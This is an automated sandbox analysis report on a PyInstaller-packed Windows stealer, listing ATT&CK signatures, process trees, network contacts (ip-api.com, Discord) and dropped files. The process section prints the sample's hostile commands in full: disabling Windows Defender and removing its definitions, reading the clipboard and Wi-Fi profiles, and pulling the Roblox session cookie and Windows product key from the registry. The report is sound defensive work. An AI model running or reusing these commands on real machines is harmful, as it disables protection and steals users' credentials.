Malware Analysis Report

2025-03-15 04:21

Sample ID 241025-3xz4fatngj
Target stub_obfuscated.exe
SHA256 efdc70eb1ee55fd5fd4a479bc4f602a9290b28659d0de57abe26c93c13714f21
Tags
pyinstaller collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Threat Level: Likely malicious

The file stub_obfuscated.exe was found to be: Likely malicious.

Malicious Activity Summary

Command and Scripting Interpreter: PowerShell

Clipboard Data

Loads dropped DLL

Reads user/profile data of web browsers

Unsecured Credentials: Credentials In Files

Accesses cryptocurrency files/wallets, possible credential harvesting

Obfuscated Files or Information: Command Obfuscation

Looks up external IP address via web service

Enumerates processes with tasklist

Unsigned PE

Detects Pyinstaller

System Network Configuration Discovery: Wi-Fi Discovery

Browser Information Discovery

Event Triggered Execution: Netsh Helper DLL

Gathers system information

Suspicious use of AdjustPrivilegeToken

Detects videocard installed

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-25 23:54

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-25 23:54

Reported

2024-10-25 23:56

Platform

win7-20241023-en

Max time kernel

144s

Max time network

130s

Command Line

"C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A

Processes

C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe

"C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe"

C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe

"C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x3f4

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\_MEI23922\python310.dll

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-25 23:54

Reported

2024-10-25 23:56

Platform

win10v2004-20241007-en

Max time kernel

139s

Max time network

145s

Command Line

"C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe"

Signatures

Clipboard Data

collection
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Browser Information Discovery

discovery

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4284 wrote to memory of 4048 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe
PID 4048 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 4048 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 2020 wrote to memory of 404 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4572 wrote to memory of 1364 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4048 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 4048 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 4840 wrote to memory of 2016 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2332 wrote to memory of 1132 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4048 wrote to memory of 3364 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 4048 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 3364 wrote to memory of 1620 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1788 wrote to memory of 1612 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4048 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 4048 wrote to memory of 3776 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 4048 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 4048 wrote to memory of 3188 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 4048 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 3776 wrote to memory of 2308 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1744 wrote to memory of 708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 1516 wrote to memory of 1100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 3188 wrote to memory of 4732 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4076 wrote to memory of 2968 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4048 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 872 wrote to memory of 2352 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4048 wrote to memory of 3304 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 3304 wrote to memory of 3372 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4048 wrote to memory of 3332 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 3332 wrote to memory of 1324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 2968 wrote to memory of 764 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4048 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe C:\Windows\system32\cmd.exe
PID 5000 wrote to memory of 404 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com

Processes

C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe

"C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe"

C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe

"C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\stub_obfuscated.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [Base64-encoded command omitted]"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [Base64-encoded command omitted]

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a2jynxmq\a2jynxmq.cmdline"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB2C5.tmp" "c:\Users\Admin\AppData\Local\Temp\a2jynxmq\CSC8D266908130C4AF3AB83E14A3C2276F.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.200.35:443 gstatic.com tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 35.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.135.233:443 discordapp.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 233.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 101.11.19.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI42842\python310.dll

MD5 63a1fa9259a35eaeac04174cecb90048
SHA1 0dc0c91bcd6f69b80dcdd7e4020365dd7853885a
SHA256 14b06796f288bc6599e458fb23a944ab0c843e9868058f02a91d4606533505ed
SHA512 896caa053f48b1e4102e0f41a7d13d932a746eea69a894ae564ef5a84ef50890514deca6496e915aae40a500955220dbc1b1016fe0b8bcdde0ad81b2917dea8b

C:\Users\Admin\AppData\Local\Temp\_MEI42842\VCRUNTIME140.dll

MD5 f34eb034aa4a9735218686590cba2e8b
SHA1 2bc20acdcb201676b77a66fa7ec6b53fa2644713
SHA256 9d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1
SHA512 d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af

C:\Users\Admin\AppData\Local\Temp\_MEI42842\base_library.zip

MD5 1a9c629de02e85430c59891b19e1edee
SHA1 dd19bc5e5705ef60f32d7ca6784398aae893937a
SHA256 a980622370dabfe680de4b68bdd7f626978b5fa7337392c96b107e21bc8f43dd
SHA512 e9bec6d257a47d48db7143f9d1fa815f274595f5d50c0a9bb512d336c6aef8d6e8cbfc9a4ef0954d38e26c36ebb8db660c2dfcec5881e7a42a0fc7ad2adf94b1

C:\Users\Admin\AppData\Local\Temp\_MEI42842\python3.DLL

MD5 fd4a39e7c1f7f07cf635145a2af0dc3a
SHA1 05292ba14acc978bb195818499a294028ab644bd
SHA256 dc909eb798a23ba8ee9f8e3f307d97755bc0d2dc0cb342cedae81fbbad32a8a9
SHA512 37d3218bc767c44e8197555d3fa18d5aad43a536cfe24ac17bf8a3084fb70bd4763ccfd16d2df405538b657f720871e0cd312dfeb7f592f3aac34d9d00d5a643

C:\Users\Admin\AppData\Local\Temp\_MEI42842\_ctypes.pyd

MD5 1635a0c5a72df5ae64072cbb0065aebe
SHA1 c975865208b3369e71e3464bbcc87b65718b2b1f
SHA256 1ea3dd3df393fa9b27bf6595be4ac859064cd8ef9908a12378a6021bba1cb177
SHA512 6e34346ea8a0aacc29ccd480035da66e280830a7f3d220fd2f12d4cfa3e1c03955d58c0b95c2674aea698a36a1b674325d3588483505874c2ce018135320ff99

C:\Users\Admin\AppData\Local\Temp\_MEI42842\libffi-7.dll

MD5 eef7981412be8ea459064d3090f4b3aa
SHA1 c60da4830ce27afc234b3c3014c583f7f0a5a925
SHA256 f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081
SHA512 dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016

C:\Users\Admin\AppData\Local\Temp\_MEI42842\_ssl.pyd

MD5 7910fb2af40e81bee211182cffec0a06
SHA1 251482ed44840b3c75426dd8e3280059d2ca06c6
SHA256 d2a7999e234e33828888ad455baa6ab101d90323579abc1095b8c42f0f723b6f
SHA512 bfe6506feb27a592fe9cf1db7d567d0d07f148ef1a2c969f1e4f7f29740c6bb8ccf946131e65fe5aa8ede371686c272b0860bd4c0c223195aaa1a44f59301b27

C:\Users\Admin\AppData\Local\Temp\_MEI42842\_sqlite3.pyd

MD5 5279d497eee4cf269d7b4059c72b14c2
SHA1 aff2f5de807ae03e599979a1a5c605fc4bad986e
SHA256 b298a44af162be7107fd187f04b63fb3827f1374594e22910ec38829da7a12dc
SHA512 20726fc5b46a6d07a3e58cdf1bed821db57ce2d9f5bee8cfd59fce779c8d5c4b517d3eb70cd2a0505e48e465d628a674d18030a909f5b73188d07cc80dcda925

C:\Users\Admin\AppData\Local\Temp\_MEI42842\_socket.pyd

MD5 819166054fec07efcd1062f13c2147ee
SHA1 93868ebcd6e013fda9cd96d8065a1d70a66a2a26
SHA256 e6deb751039cd5424a139708475ce83f9c042d43e650765a716cb4a924b07e4f
SHA512 da3a440c94cb99b8af7d2bc8f8f0631ae9c112bd04badf200edbf7ea0c48d012843b4a9fb9f1e6d3a9674fd3d4eb6f0fa78fd1121fad1f01f3b981028538b666

C:\Users\Admin\AppData\Local\Temp\_MEI42842\_queue.pyd

MD5 d8c1b81bbc125b6ad1f48a172181336e
SHA1 3ff1d8dcec04ce16e97e12263b9233fbf982340c
SHA256 925f05255f4aae0997dc4ec94d900fd15950fd840685d5b8aa755427c7422b14
SHA512 ccc9f0d3aca66729832f26be12f8e7021834bbee1f4a45da9451b1aa5c2e63126c0031d223af57cf71fad2c85860782a56d78d8339b35720194df139076e0772

C:\Users\Admin\AppData\Local\Temp\_MEI42842\_lzma.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI42842\_hashlib.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI42842\_decimal.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI42842\_bz2.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI42842\unicodedata.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI42842\sqlite3.dll

C:\Users\Admin\AppData\Local\Temp\_MEI42842\select.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI42842\libssl-1_1.dll

C:\Users\Admin\AppData\Local\Temp\_MEI42842\libcrypto-1_1.dll

C:\Users\Admin\AppData\Local\Temp\_MEI42842\zstandard\backend_c.cp310-win_amd64.pyd

memory/404-61-0x000001D5363A0000-0x000001D5363C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ksem1pey.o2m.ps1

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

\??\c:\Users\Admin\AppData\Local\Temp\a2jynxmq\a2jynxmq.cmdline

\??\c:\Users\Admin\AppData\Local\Temp\a2jynxmq\a2jynxmq.0.cs

\??\c:\Users\Admin\AppData\Local\Temp\a2jynxmq\CSC8D266908130C4AF3AB83E14A3C2276F.TMP

C:\Users\Admin\AppData\Local\Temp\RESB2C5.tmp

C:\Users\Admin\AppData\Local\Temp\a2jynxmq\a2jynxmq.dll

memory/2968-151-0x000001E1AF590000-0x000001E1AF598000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Temp\  ‎  ‍‎‎  \Display (1).png

C:\Users\Admin\AppData\Local\Temp\  ‎  ‍‎‎  \Common Files\Desktop\RemoveRepair.docx

C:\Users\Admin\AppData\Local\Temp\  ‎  ‍‎‎  \Common Files\Desktop\SetLock.pdf

C:\Users\Admin\AppData\Local\Temp\  ‎  ‍‎‎  \Common Files\Desktop\ReadImport.docx

C:\Users\Admin\AppData\Local\Temp\  ‎  ‍‎‎  \Common Files\Desktop\JoinResume.docx

C:\Users\Admin\AppData\Local\Temp\  ‎  ‍‎‎  \Common Files\Desktop\CompressOptimize.xlsx

C:\Users\Admin\AppData\Local\Temp\  ‎  ‍‎‎  \Common Files\Documents\BackupEnable.vssx

C:\Users\Admin\AppData\Local\Temp\  ‎  ‍‎‎  \Common Files\Documents\TestCheckpoint.xlsx

C:\Users\Admin\AppData\Local\Temp\  ‎  ‍‎‎  \Common Files\Music\DisableCompress.pdf

C:\Users\Admin\AppData\Local\Temp\  ‎  ‍‎‎  \Common Files\Downloads\BackupSwitch.AAC

C:\Users\Admin\AppData\Local\Temp\  ‎  ‍‎‎  \Common Files\Pictures\My Wallpaper.jpg

C:\Users\Admin\AppData\Local\Temp\  ‎  ‍‎‎  \Common Files\Pictures\CopyInitialize.png

C:\Users\Admin\AppData\Local\Temp\  ‎  ‍‎‎  \Common Files\Documents\GrantExpand.xlsx

C:\Users\Admin\AppData\Local\Temp\  ‎  ‍‎‎  \Common Files\Documents\GrantCompare.xlsx

C:\Users\Admin\AppData\Local\Temp\  ‎  ‍‎‎  \Common Files\Documents\CompleteInitialize.xlsx

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
